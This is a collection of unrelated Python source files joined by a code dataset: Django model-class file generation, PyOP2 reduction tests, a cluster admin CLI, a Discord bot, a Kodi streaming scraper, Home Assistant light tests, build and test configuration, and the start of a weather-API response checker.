default_attr.save()
# https://stackoverflow.com/questions/5362771/how-to-load-a-module-from-code-in-a-string
# Note: we probably want to save the code file here as that can then help with local iteration... but then we risk getting out of sync with the database...
# Note: We could check to see when running whether the code is equal to the file!
# Then ask the user to either upload or overwrite.
modelflow_root = pathlib.Path(__file__).parents[5]
projects_folder = os.path.join(modelflow_root, 'projects')
if not os.path.exists(projects_folder):
os.mkdir(projects_folder)
project_folder = os.path.join(projects_folder, project.name)
if not os.path.exists(project_folder):
os.mkdir(project_folder)
model_classes_dir = os.path.join(project_folder, 'model_classes')
if not os.path.exists(model_classes_dir):
os.mkdir(model_classes_dir)
write_file_for_model_class(model_classes_dir, model_class)
return JsonResponse({'id': model_class.id})
def write_file_for_model_class(model_classes_dir, model_class):
model_class_text = ''
# TODO: Handle imports
model_class_text += f'class {model_class.key}:\n'
model_class_text += f' name = "{model_class.label}"\n'
default_params = []
default_states = []
for attribute in DefaultAttribute.objects.filter(model_class=model_class):
value = attribute.value
dtype = attribute.dtype
if dtype in ['int']:
value = int(value)
elif dtype in ['float']:
value = float(value)
obj = dict(
key=attribute.key,
label=attribute.label,
units=attribute.units,
private=attribute.is_private,
value=value,
confidence=attribute.confidence,
notes=attribute.notes,
source=attribute.source
)
if attribute.kind == 'param':
default_params.append(obj)
else:
default_states.append(obj)
for part in [['params', default_params], ['states', default_states]]:
json_str = json.dumps(part[1], indent=4)
json_str = json_str.replace(': false', ': False')
json_str = json_str.replace(': true', ': True')
json_str = json_str.replace(': null', ': ""')
json_str = part[0] + ' = ' + json_str
lines = json_str.split('\n')
new_lines = []
for line in lines:
new_lines.append(' ' + line)
model_class_text += '\n'.join(new_lines)
model_class_text += '\n'
model_class_text += '\n @staticmethod\n'
for line in model_class.run_step_code.split('\n'):
model_class_text += ' ' + line + '\n'
with open(os.path.join(model_classes_dir, f'{model_class.key}.py'), 'w') as f:
f.write(model_class_text)
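
# For illustration only (the class name and fields below are invented, not taken from
# this project): a file produced by write_file_for_model_class() is shaped roughly like
#
#   class battery:
#       name = "Battery"
#       params = [
#           {"key": "capacity", "label": "Capacity", "units": "kWh", ...},
#       ]
#       states = [
#           {"key": "charge", "label": "Charge", "units": "kWh", ...},
#       ]
#
#       @staticmethod
#       def run_step(...):
#           ...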
| StarcoderdataPython |
1755938 | <reponame>hackersandslackers/jsonld-scraper-tutorial<filename>main.py
"""Script entry point."""
from extruct_tutorial import scrape
from config import URL
scrape(URL)
| StarcoderdataPython |
1627962 | <filename>test/unit/test_global_reduction.py
# This file is part of PyOP2
#
# PyOP2 is Copyright (c) 2012, Imperial College London and
# others. Please see the AUTHORS file in the main source directory for
# a full list of copyright holders. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * The name of Imperial College London or that of other
# contributors may not be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTERS
# ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE.
import pytest
import numpy
from numpy.testing import assert_allclose
from pyop2 import op2
# Large enough that there is more than one block and more than one
# thread per element in device backends
nelems = 4096
class TestGlobalReductions:
"""
Global reduction argument tests
"""
@pytest.fixture(scope='module', params=[(nelems, nelems, nelems, nelems),
(0, nelems, nelems, nelems),
(nelems / 2, nelems, nelems, nelems)])
def set(cls, request):
return op2.Set(request.param, 'set')
@pytest.fixture(scope='module')
def dset(cls, set):
return op2.DataSet(set, 1, 'set')
@pytest.fixture(scope='module')
def dset2(cls, set):
return op2.DataSet(set, 2, 'set2')
@pytest.fixture
def d1(cls, dset):
return op2.Dat(dset, numpy.arange(nelems) + 1, dtype=numpy.uint32)
@pytest.fixture
def d2(cls, dset2):
return op2.Dat(dset2, numpy.arange(2 * nelems) + 1, dtype=numpy.uint32)
@pytest.fixture(scope='module')
def k1_write_to_dat(cls):
k = """
void k(unsigned int *x, unsigned int *g) { *x = *g; }
"""
return op2.Kernel(k, "k")
@pytest.fixture(scope='module')
def k1_inc_to_global(cls):
k = """
void k(unsigned int *x, unsigned int *g) { *g += *x; }
"""
return op2.Kernel(k, "k")
@pytest.fixture(scope='module')
def k1_min_to_global(cls):
k = """
void k(unsigned int *x, unsigned int *g) { if (*x < *g) *g = *x; }
"""
return op2.Kernel(k, "k")
@pytest.fixture(scope='module')
def k2_min_to_global(cls):
k = """
void k(unsigned int *x, unsigned int *g) {
if (x[0] < g[0]) g[0] = x[0];
if (x[1] < g[1]) g[1] = x[1];
}
"""
return op2.Kernel(k, "k")
@pytest.fixture(scope='module')
def k1_max_to_global(cls):
k = """
void k(unsigned int *x, unsigned int *g) {
if (*x > *g) *g = *x;
}
"""
return op2.Kernel(k, "k")
@pytest.fixture(scope='module')
def k2_max_to_global(cls):
k = """
void k(unsigned int *x, unsigned int *g) {
if (x[0] > g[0]) g[0] = x[0];
if (x[1] > g[1]) g[1] = x[1];
}
"""
return op2.Kernel(k, "k")
@pytest.fixture(scope='module')
def k2_write_to_dat(cls, request):
k = """
void k(unsigned int *x, unsigned int *g) { *x = g[0] + g[1]; }
"""
return op2.Kernel(k, "k")
@pytest.fixture(scope='module')
def k2_inc_to_global(cls):
k = """
void k(unsigned int *x, unsigned int *g) { g[0] += x[0]; g[1] += x[1]; }
"""
return op2.Kernel(k, "k")
@pytest.fixture
def duint32(cls, dset):
return op2.Dat(dset, [12] * nelems, numpy.uint32, "duint32")
@pytest.fixture
def dint32(cls, dset):
return op2.Dat(dset, [-12] * nelems, numpy.int32, "dint32")
@pytest.fixture
def dfloat32(cls, dset):
return op2.Dat(dset, [-12.0] * nelems, numpy.float32, "dfloat32")
@pytest.fixture
def dfloat64(cls, dset):
return op2.Dat(dset, [-12.0] * nelems, numpy.float64, "dfloat64")
def test_direct_min_uint32(self, backend, set, duint32):
kernel_min = """
void kernel_min(unsigned int* x, unsigned int* g)
{
if ( *x < *g ) *g = *x;
}
"""
g = op2.Global(1, 8, numpy.uint32, "g")
op2.par_loop(op2.Kernel(kernel_min, "kernel_min"), set,
duint32(op2.READ),
g(op2.MIN))
assert g.data[0] == 8
def test_direct_min_int32(self, backend, set, dint32):
kernel_min = """
void kernel_min(int* x, int* g)
{
if ( *x < *g ) *g = *x;
}
"""
g = op2.Global(1, 8, numpy.int32, "g")
op2.par_loop(op2.Kernel(kernel_min, "kernel_min"), set,
dint32(op2.READ),
g(op2.MIN))
assert g.data[0] == -12
def test_direct_max_int32(self, backend, set, dint32):
kernel_max = """
void kernel_max(int* x, int* g)
{
if ( *x > *g ) *g = *x;
}
"""
g = op2.Global(1, -42, numpy.int32, "g")
op2.par_loop(op2.Kernel(kernel_max, "kernel_max"), set,
dint32(op2.READ),
g(op2.MAX))
assert g.data[0] == -12
def test_direct_min_float(self, backend, set, dfloat32):
kernel_min = """
void kernel_min(float* x, float* g)
{
if ( *x < *g ) *g = *x;
}
"""
g = op2.Global(1, -.8, numpy.float32, "g")
op2.par_loop(op2.Kernel(kernel_min, "kernel_min"), set,
dfloat32(op2.READ),
g(op2.MIN))
assert_allclose(g.data[0], -12.0)
def test_direct_max_float(self, backend, set, dfloat32):
kernel_max = """
void kernel_max(float* x, float* g)
{
if ( *x > *g ) *g = *x;
}
"""
g = op2.Global(1, -42.8, numpy.float32, "g")
op2.par_loop(op2.Kernel(kernel_max, "kernel_max"), set,
dfloat32(op2.READ),
g(op2.MAX))
assert_allclose(g.data[0], -12.0)
def test_direct_min_double(self, backend, set, dfloat64):
kernel_min = """
void kernel_min(double* x, double* g)
{
if ( *x < *g ) *g = *x;
}
"""
g = op2.Global(1, -.8, numpy.float64, "g")
op2.par_loop(op2.Kernel(kernel_min, "kernel_min"), set,
dfloat64(op2.READ),
g(op2.MIN))
assert_allclose(g.data[0], -12.0)
def test_direct_max_double(self, backend, set, dfloat64):
kernel_max = """
void kernel_max(double* x, double* g)
{
if ( *x > *g ) *g = *x;
}
"""
g = op2.Global(1, -42.8, numpy.float64, "g")
op2.par_loop(op2.Kernel(kernel_max, "kernel_max"), set,
dfloat64(op2.READ),
g(op2.MAX))
assert_allclose(g.data[0], -12.0)
def test_1d_read(self, backend, k1_write_to_dat, set, d1):
g = op2.Global(1, 1, dtype=numpy.uint32)
op2.par_loop(k1_write_to_dat, set,
d1(op2.WRITE),
g(op2.READ))
assert all(d1.data == g.data)
def test_1d_read_no_init(self, backend, k1_write_to_dat, set, d1):
g = op2.Global(1, dtype=numpy.uint32)
d1.data[:] = 100
op2.par_loop(k1_write_to_dat, set,
d1(op2.WRITE),
g(op2.READ))
assert all(g.data == 0)
assert all(d1.data == 0)
def test_2d_read(self, backend, k2_write_to_dat, set, d1):
g = op2.Global(2, (1, 2), dtype=numpy.uint32)
op2.par_loop(k2_write_to_dat, set,
d1(op2.WRITE),
g(op2.READ))
assert all(d1.data == g.data.sum())
def test_1d_inc(self, backend, k1_inc_to_global, set, d1):
g = op2.Global(1, 0, dtype=numpy.uint32)
op2.par_loop(k1_inc_to_global, set,
d1(op2.READ),
g(op2.INC))
assert g.data == d1.data.sum()
def test_1d_inc_no_data(self, backend, k1_inc_to_global, set, d1):
g = op2.Global(1, dtype=numpy.uint32)
op2.par_loop(k1_inc_to_global, set,
d1(op2.READ),
g(op2.INC))
assert g.data == d1.data.sum()
def test_1d_min_dat_is_min(self, backend, k1_min_to_global, set, d1):
val = d1.data.min() + 1
g = op2.Global(1, val, dtype=numpy.uint32)
op2.par_loop(k1_min_to_global, set,
d1(op2.READ),
g(op2.MIN))
assert g.data == d1.data.min()
def test_1d_min_global_is_min(self, backend, k1_min_to_global, set, d1):
d1.data[:] += 10
val = d1.data.min() - 1
g = op2.Global(1, val, dtype=numpy.uint32)
op2.par_loop(k1_min_to_global, set,
d1(op2.READ),
g(op2.MIN))
assert g.data == val
def test_1d_max_dat_is_max(self, backend, k1_max_to_global, set, d1):
val = d1.data.max() - 1
g = op2.Global(1, val, dtype=numpy.uint32)
op2.par_loop(k1_max_to_global, set,
d1(op2.READ),
g(op2.MAX))
assert g.data == d1.data.max()
def test_1d_max_global_is_max(self, backend, k1_max_to_global, set, d1):
val = d1.data.max() + 1
g = op2.Global(1, val, dtype=numpy.uint32)
op2.par_loop(k1_max_to_global, set,
d1(op2.READ),
g(op2.MAX))
assert g.data == val
def test_2d_inc(self, backend, k2_inc_to_global, set, d2):
g = op2.Global(2, (0, 0), dtype=numpy.uint32)
op2.par_loop(k2_inc_to_global, set,
d2(op2.READ),
g(op2.INC))
assert g.data[0] == d2.data[:, 0].sum()
assert g.data[1] == d2.data[:, 1].sum()
def test_2d_min_dat_is_min(self, backend, k2_min_to_global, set, d2):
val_0 = d2.data[:, 0].min() + 1
val_1 = d2.data[:, 1].min() + 1
g = op2.Global(2, (val_0, val_1), dtype=numpy.uint32)
op2.par_loop(k2_min_to_global, set,
d2(op2.READ),
g(op2.MIN))
assert g.data[0] == d2.data[:, 0].min()
assert g.data[1] == d2.data[:, 1].min()
def test_2d_min_global_is_min(self, backend, k2_min_to_global, set, d2):
d2.data[:, 0] += 10
d2.data[:, 1] += 10
val_0 = d2.data[:, 0].min() - 1
val_1 = d2.data[:, 1].min() - 1
g = op2.Global(2, (val_0, val_1), dtype=numpy.uint32)
op2.par_loop(k2_min_to_global, set,
d2(op2.READ),
g(op2.MIN))
assert g.data[0] == val_0
assert g.data[1] == val_1
def test_2d_max_dat_is_max(self, backend, k2_max_to_global, set, d2):
val_0 = d2.data[:, 0].max() - 1
val_1 = d2.data[:, 1].max() - 1
g = op2.Global(2, (val_0, val_1), dtype=numpy.uint32)
op2.par_loop(k2_max_to_global, set,
d2(op2.READ),
g(op2.MAX))
assert g.data[0] == d2.data[:, 0].max()
assert g.data[1] == d2.data[:, 1].max()
def test_2d_max_global_is_max(self, backend, k2_max_to_global, set, d2):
max_val_0 = d2.data[:, 0].max() + 1
max_val_1 = d2.data[:, 1].max() + 1
g = op2.Global(2, (max_val_0, max_val_1), dtype=numpy.uint32)
op2.par_loop(k2_max_to_global, set,
d2(op2.READ),
g(op2.MAX))
assert g.data[0] == max_val_0
assert g.data[1] == max_val_1
def test_1d_multi_inc_same_global(self, backend, k1_inc_to_global, set, d1):
g = op2.Global(1, 0, dtype=numpy.uint32)
op2.par_loop(k1_inc_to_global, set,
d1(op2.READ),
g(op2.INC))
assert g.data == d1.data.sum()
op2.par_loop(k1_inc_to_global, set,
d1(op2.READ),
g(op2.INC))
assert g.data == d1.data.sum() * 2
def test_1d_multi_inc_same_global_reset(self, backend, k1_inc_to_global, set, d1):
g = op2.Global(1, 0, dtype=numpy.uint32)
op2.par_loop(k1_inc_to_global, set,
d1(op2.READ),
g(op2.INC))
assert g.data == d1.data.sum()
g.data = 10
op2.par_loop(k1_inc_to_global, set,
d1(op2.READ),
g(op2.INC))
assert g.data == d1.data.sum() + 10
def test_1d_multi_inc_diff_global(self, backend, k1_inc_to_global, set, d1):
g = op2.Global(1, 0, dtype=numpy.uint32)
g2 = op2.Global(1, 10, dtype=numpy.uint32)
op2.par_loop(k1_inc_to_global, set,
d1(op2.READ),
g(op2.INC))
assert g.data == d1.data.sum()
op2.par_loop(k1_inc_to_global, set,
d1(op2.READ),
g2(op2.INC))
assert g2.data == d1.data.sum() + 10
def test_globals_with_different_types(self, backend, set):
g_uint32 = op2.Global(1, [0], numpy.uint32, "g_uint32")
g_double = op2.Global(1, [0.0], numpy.float64, "g_double")
k = """void k(unsigned int* i, double* d) { *i += 1; *d += 1.0f; }"""
op2.par_loop(op2.Kernel(k, "k"),
set,
g_uint32(op2.INC),
g_double(op2.INC))
assert_allclose(g_uint32.data[0], g_double.data[0])
assert g_uint32.data[0] == set.size
| StarcoderdataPython |
57410 | <gh_stars>1-10
#!/usr/bin/env python
import sys, os
from argparse import ArgumentParser
from .encryptor import getEncryptor
from .poller import createPoller
from .tcp_connection import TcpConnection
class Utility(object):
def __init__(self, args):
self.__result = None
if self.__getData(args):
self.__poller = createPoller('auto')
self.__connection = TcpConnection(self.__poller,
onDisconnected=self.__onDisconnected,
onMessageReceived=self.__onMessageReceived,
onConnected=self.__onConnected,
timeout=900.0)
if self.__password is not None:
self.__connection.encryptor = getEncryptor(self.__password)
self.__isConnected = self.__connection.connect(self.__host, self.__port)
if not self.__isConnected:
self.__result = 'can\'t connected'
while self.__isConnected:
self.__poller.poll(0.5)
def __onMessageReceived(self, message):
if self.__connection.encryptor and not self.__connection.sendRandKey:
self.__connection.sendRandKey = message
self.__connection.send(self.__data)
return
if isinstance(message, str):
self.__result = message
elif isinstance(message, dict):
self.__result = '\n'.join('%s: %s' % (k, v) for k, v in sorted(message.items()))
else:
self.__result = str(message)
self.__connection.disconnect()
def __onDisconnected(self):
self.__isConnected = False
if self.__result is None:
self.__result = 'connection lost'
def __onConnected(self):
if self.__connection.encryptor:
self.__connection.recvRandKey = os.urandom(32)
self.__connection.send(self.__connection.recvRandKey)
return
self.__connection.send(self.__data)
def getResult(self):
return self.__result
def __getData(self, args):
parser = Parser()
data = parser.parse(args)
if not self.__checkCorrectAdress(data.connection):
self.__result = 'invalid adress to connect'
return False
self.__host, self.__port = data.connection.rsplit(':', 1)
self.__port = int(self.__port)
self.__password = data.password
if data.status:
self.__data = ['status']
return True
elif data.add:
if not self.__checkCorrectAdress(data.add):
self.__result = 'invalid adress to command add'
return False
self.__data = ['add', data.add]
return True
elif data.remove:
if not self.__checkCorrectAdress(data.remove):
self.__result = 'invalid adress to command remove'
return False
self.__data = ['remove', data.remove]
return True
elif data.version is not None:
try:
ver = int(data.version)
except ValueError:
return False
self.__data = ['set_version', ver]
return True
else:
self.__result = 'invalid command'
return False
def __checkCorrectAdress(self, adress):
try:
host, port = adress.rsplit(':', 1)
port = int(port)
assert (port > 0 and port < 65536)
return True
except:
return False
class Parser(object):
def __init__(self):
self.__parser = ArgumentParser()
self.__parser.add_argument('-conn', action='store', dest='connection', help='adress to connect')
self.__parser.add_argument('-pass', action='store', dest='password', help='cluster\'s password')
self.__parser.add_argument('-status', action='store_true', help='send command \'status\'')
self.__parser.add_argument('-add', action='store', dest='add', help='send command \'add\'')
self.__parser.add_argument('-remove', action='store', dest='remove', help='send command \'remove\'')
self.__parser.add_argument('-set_version', action='store', dest='version', help='set cluster code version')
def parse(self, args):
return self.__parser.parse_args(args)
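
# Example invocations (illustrative; the exact script name is an assumption):
#   python utility.py -conn 127.0.0.1:4321 -pass secret -status
#   python utility.py -conn 127.0.0.1:4321 -add 127.0.0.1:4322
#   python utility.py -conn 127.0.0.1:4321 -remove 127.0.0.1:4322
#   python utility.py -conn 127.0.0.1:4321 -set_version 2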
def main(args=None):
if args is None:
args = sys.argv[1:]
o = Utility(args)
sys.stdout.write(o.getResult())
sys.stdout.write(os.linesep)
if __name__ == '__main__':
main()
| StarcoderdataPython |
1606832 | import shlex
import aiohttp
import discord
import discord.ext
import logging
import argparse
import commands
import datetime
from cmd_manager import dispatcher
from config import config
from cmd_manager.bot_args import parser, HelpException, UnkownCommandException
from utils.handle_messages import send_message, delete_message
client = discord.Client()
commands.load_commands()
@client.event
async def on_ready():
logging.info(f'Logged in as\nUsername: {client.user.name}\nID: {client.user.id}\nAPI Version: {discord.__version__}')
gameplayed = discord.Game(name=config.MAIN.get("gameplayed", "Awaiting Spoiler"))
await client.change_presence(activity=gameplayed)
@client.event
async def on_message(message):
await handle_commands(message)
@client.event
async def on_message_edit(_, message):
await handle_commands(message)
async def handle_commands(message):
if isinstance(message.channel, discord.abc.GuildChannel):
server_name = message.guild.name
channel_name = message.channel.name
else:
server_name = "Private Message"
channel_name = None
if not message.content.startswith(">>"):
return
if len(message.content) == 2:
return
today = datetime.datetime.today().strftime("%a %d %b %H:%M:%S")
logging.info(f"Date: {today} User: {message.author} Server: {server_name} Channel: {channel_name} "
f"Command: {message.content[:50]}")
arg_string = message.clean_content[2:]
try:
arg_string = shlex.split(arg_string)
except ValueError as err:
return await send_message(message.author, f"```{str(err)}```")
try:
args = parser.parse_args(arg_string)
except HelpException as err:
return await send_message(message.author, f"```{str(err)}```")
except (UnkownCommandException, argparse.ArgumentError) as err:
if arg_string[0] == "spoiler":
await delete_message(message)
if arg_string[0] in dispatcher.commands:
return await send_message(message.author, f"```{str(err)}```")
return
return await dispatcher.handle(args.command, client, message, args)
def main():
while True:
try:
client.run(config.MAIN.login_token)
except aiohttp.client_exceptions.ClientConnectorError:
continue
except KeyboardInterrupt:
return client.close()
if __name__ == "__main__":
main()
| StarcoderdataPython |
1624846 | <filename>plugin.video.salts/scrapers/moviehut_scraper.py
"""
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import re
import urlparse
import log_utils # @UnusedImport
import kodi
import dom_parser2
from salts_lib import scraper_utils
from salts_lib.constants import FORCE_NO_MATCH
from salts_lib.constants import QUALITIES
from salts_lib.constants import VIDEO_TYPES
import scraper
BASE_URL = 'http://netflix-putlocker.com'
QUALITY_MAP = {'DVD': QUALITIES.HIGH, 'TS': QUALITIES.MEDIUM, 'CAM': QUALITIES.LOW}
class Scraper(scraper.Scraper):
base_url = BASE_URL
def __init__(self, timeout=scraper.DEFAULT_TIMEOUT):
self.timeout = timeout
self.base_url = kodi.get_setting('%s-base_url' % (self.get_name()))
@classmethod
def provides(cls):
return frozenset([VIDEO_TYPES.MOVIE])
@classmethod
def get_name(cls):
return 'MovieHut'
def format_source_label(self, item):
label = super(self.__class__, self).format_source_label(item)
if 'part_label' in item:
label += ' (%s)' % (item['part_label'])
return label
def get_sources(self, video):
source_url = self.get_url(video)
hosters = []
if not source_url or source_url == FORCE_NO_MATCH: return hosters
url = scraper_utils.urljoin(self.base_url, source_url)
html = self._http_get(url, cache_limit=.5)
pattern = 'href="([^"]+)">Watch (Link \d+)(.*?)</td>\s*<td[^>]*>(.*?)</td>.*?<td[^>]*id="lv_\d+"[^>]*>([^<]+)'
for match in re.finditer(pattern, html, re.DOTALL):
stream_url, label, part_str, q_str, views = match.groups()
q_str = q_str.strip().upper()
parts = re.findall('href="([^"]+)">(Part\s+\d+)<', part_str, re.DOTALL)
if parts:
multipart = True
else:
multipart = False
host = urlparse.urlparse(stream_url).hostname
if host is None: continue
quality = scraper_utils.get_quality(video, host, QUALITY_MAP.get(q_str, QUALITIES.HIGH))
hoster = {'multi-part': multipart, 'host': host, 'class': self, 'quality': quality, 'views': views, 'rating': None, 'url': stream_url, 'direct': False}
hoster['extra'] = label
hosters.append(hoster)
for part in parts:
stream_url, part_label = part
part_hoster = hoster.copy()
part_hoster['part_label'] = part_label
part_hoster['url'] = stream_url
hosters.append(part_hoster)
return hosters
def search(self, video_type, title, year, season=''): # @UnusedVariable
results = []
search_url = scraper_utils.urljoin(self.base_url, '/bestmatch-fund-movies-%s.html')
search_title = title.replace(' ', '-')
search_title = re.sub('[^A-Za-z0-9-]', '', search_title).lower()
search_url = search_url % (search_title)
html = self._http_get(search_url, cache_limit=1)
for _attrs, item in dom_parser2.parse_dom(html, 'div', {'class': 'thumbsTitle'}):
match = dom_parser2.parse_dom(item, 'a', req='href')
if not match: continue
match_url, match_title_year = match[0].attrs['href'], match[0].content
match_title, match_year = scraper_utils.extra_year(match_title_year)
if (not year or not match_year or year == match_year):
result = {'url': scraper_utils.pathify_url(match_url), 'title': scraper_utils.cleanse_title(match_title), 'year': match_year}
results.append(result)
return results
| StarcoderdataPython |
3036 | <gh_stars>1000+
"""Test Evil Genius Labs light."""
from unittest.mock import patch
import pytest
from homeassistant.components.light import (
ATTR_COLOR_MODE,
ATTR_SUPPORTED_COLOR_MODES,
ColorMode,
LightEntityFeature,
)
from homeassistant.const import ATTR_SUPPORTED_FEATURES
@pytest.mark.parametrize("platforms", [("light",)])
async def test_works(hass, setup_evil_genius_labs):
"""Test it works."""
state = hass.states.get("light.fibonacci256_23d4")
assert state is not None
assert state.state == "on"
assert state.attributes["brightness"] == 128
assert state.attributes[ATTR_COLOR_MODE] == ColorMode.RGB
assert state.attributes[ATTR_SUPPORTED_COLOR_MODES] == [ColorMode.RGB]
assert state.attributes[ATTR_SUPPORTED_FEATURES] == LightEntityFeature.EFFECT
@pytest.mark.parametrize("platforms", [("light",)])
async def test_turn_on_color(hass, setup_evil_genius_labs):
"""Test turning on with a color."""
with patch(
"pyevilgenius.EvilGeniusDevice.set_path_value"
) as mock_set_path_value, patch(
"pyevilgenius.EvilGeniusDevice.set_rgb_color"
) as mock_set_rgb_color:
await hass.services.async_call(
"light",
"turn_on",
{
"entity_id": "light.fibonacci256_23d4",
"brightness": 100,
"rgb_color": (10, 20, 30),
},
blocking=True,
)
assert len(mock_set_path_value.mock_calls) == 2
    assert mock_set_path_value.mock_calls[0][1] == ("brightness", 100)
    assert mock_set_path_value.mock_calls[1][1] == ("power", 1)
assert len(mock_set_rgb_color.mock_calls) == 1
    assert mock_set_rgb_color.mock_calls[0][1] == (10, 20, 30)
@pytest.mark.parametrize("platforms", [("light",)])
async def test_turn_on_effect(hass, setup_evil_genius_labs):
"""Test turning on with an effect."""
with patch("pyevilgenius.EvilGeniusDevice.set_path_value") as mock_set_path_value:
await hass.services.async_call(
"light",
"turn_on",
{
"entity_id": "light.fibonacci256_23d4",
"effect": "Pride Playground",
},
blocking=True,
)
assert len(mock_set_path_value.mock_calls) == 2
    assert mock_set_path_value.mock_calls[0][1] == ("pattern", 4)
    assert mock_set_path_value.mock_calls[1][1] == ("power", 1)
@pytest.mark.parametrize("platforms", [("light",)])
async def test_turn_off(hass, setup_evil_genius_labs):
"""Test turning off."""
with patch("pyevilgenius.EvilGeniusDevice.set_path_value") as mock_set_path_value:
await hass.services.async_call(
"light",
"turn_off",
{
"entity_id": "light.fibonacci256_23d4",
},
blocking=True,
)
assert len(mock_set_path_value.mock_calls) == 1
    assert mock_set_path_value.mock_calls[0][1] == ("power", 0)
| StarcoderdataPython |
1761930 | <gh_stars>100-1000
import pathlib
from setuptools import setup
here = pathlib.Path(__file__).parent
readme = (here / "README.md").read_text()
setup(
name="pygame-textinput",
version="1.0.0",
description="Enter text using pygame",
long_description=readme,
long_description_content_type="text/markdown",
url="https://github.com/Nearoo/pygame-text-input",
author="<NAME>",
author_email="<EMAIL>",
license="MIT",
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
],
packages=["pygame_textinput"],
include_package_data=True,
install_requires=["pygame"],
) | StarcoderdataPython |
121461 | <filename>env/lib/python3.8/site-packages/location/runtests.py<gh_stars>0
#!/usr/bin/env python
import os
import sys
from os.path import dirname, abspath
from django.conf import settings
TRAVIS = False
if os.environ.get('TRAVIS') is not None:
TRAVIS = True
if not settings.configured:
DATABASES = {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.spatialite',
'NAME': ':memory:'
},
}
if TRAVIS:
DATABASES = {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.postgis',
'NAME': 'django_location',
'USERNAME': 'postgres',
'HOST': '127.0.0.1'
}
}
settings.configure(
POSTGIS_VERSION=(1, 5, 3),
DATABASES=DATABASES,
INSTALLED_APPS=[
'django.contrib.auth',
'django.contrib.contenttypes',
'django_mailbox',
'location',
],
USE_TZ=True,
)
from django.test.simple import DjangoTestSuiteRunner
def runtests(*test_args):
if not test_args:
test_args = ['location']
parent = dirname(abspath(__file__))
sys.path.insert(0, parent)
if not TRAVIS:
from django.db import connection
cursor = connection.cursor()
cursor.execute("SELECT InitSpatialMetaData();")
runner = DjangoTestSuiteRunner(
verbosity=1,
interactive=False,
failfast=False
)
failures = runner.run_tests(test_args)
sys.exit(failures)
if __name__ == '__main__':
runtests(*sys.argv[1:])
| StarcoderdataPython |
3351640 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'targets': [
# Level 1
{
'target_name': 'test_wl1_fail',
'type': 'executable',
'msvs_settings': {
'VCCLCompilerTool': {
'WarningLevel': '1',
'WarnAsError': 'true',
}
},
'sources': ['warning-level1.cc'],
},
{
'target_name': 'test_wl1_pass',
'type': 'executable',
'msvs_settings': {
'VCCLCompilerTool': {
'WarningLevel': '1',
'WarnAsError': 'true',
}
},
'sources': ['warning-level2.cc'],
},
# Level 2
{
'target_name': 'test_wl2_fail',
'type': 'executable',
'msvs_settings': {
'VCCLCompilerTool': {
'WarningLevel': '2',
'WarnAsError': 'true',
}
},
'sources': ['warning-level2.cc'],
},
{
'target_name': 'test_wl2_pass',
'type': 'executable',
'msvs_settings': {
'VCCLCompilerTool': {
'WarningLevel': '2',
'WarnAsError': 'true',
}
},
'sources': ['warning-level3.cc'],
},
# Level 3
{
'target_name': 'test_wl3_fail',
'type': 'executable',
'msvs_settings': {
'VCCLCompilerTool': {
'WarningLevel': '3',
'WarnAsError': 'true',
}
},
'sources': ['warning-level3.cc'],
},
{
'target_name': 'test_wl3_pass',
'type': 'executable',
'msvs_settings': {
'VCCLCompilerTool': {
'WarningLevel': '3',
'WarnAsError': 'true',
}
},
'sources': ['warning-level4.cc'],
},
# Level 4
{
'target_name': 'test_wl4_fail',
'type': 'executable',
'msvs_settings': {
'VCCLCompilerTool': {
'WarningLevel': '4',
'WarnAsError': 'true',
}
},
'sources': ['warning-level4.cc'],
},
# Default level
{
'target_name': 'test_def_fail',
'type': 'executable',
'msvs_settings': {
'VCCLCompilerTool': {
'WarnAsError': 'true',
}
},
'sources': ['warning-level1.cc'],
},
{
'target_name': 'test_def_pass',
'type': 'executable',
'msvs_settings': {
'VCCLCompilerTool': {
}
},
'sources': ['warning-level2.cc'],
},
]
}
| StarcoderdataPython |
4832185 | <gh_stars>0
import requests
import json
def check_response_body(responseContent):
# Checks if the structure of the response body has all required fields
# data
if not 'data' in responseContent:
print('No data field in response json!')
return False
# timelines - existence, list type, length > 0
if not 'timelines' in responseContent['data']:
print('No timelines field in response json!')
return False
if not isinstance(responseContent['data']['timelines'], list):
print('timelines field exists but is not a list in response json!')
return False
if not len(responseContent['data']['timelines']) > 0:
print('timelines field exists but is not a list in response json!')
return False
# intervals - existence, list type, length > 0
if not 'intervals' in responseContent['data']['timelines'][0]:
print('No intervals field in response json!')
return False
if not isinstance(responseContent['data']['timelines'][0]['intervals'], list):
print('intervals field exists but is not a list in response json!')
return False
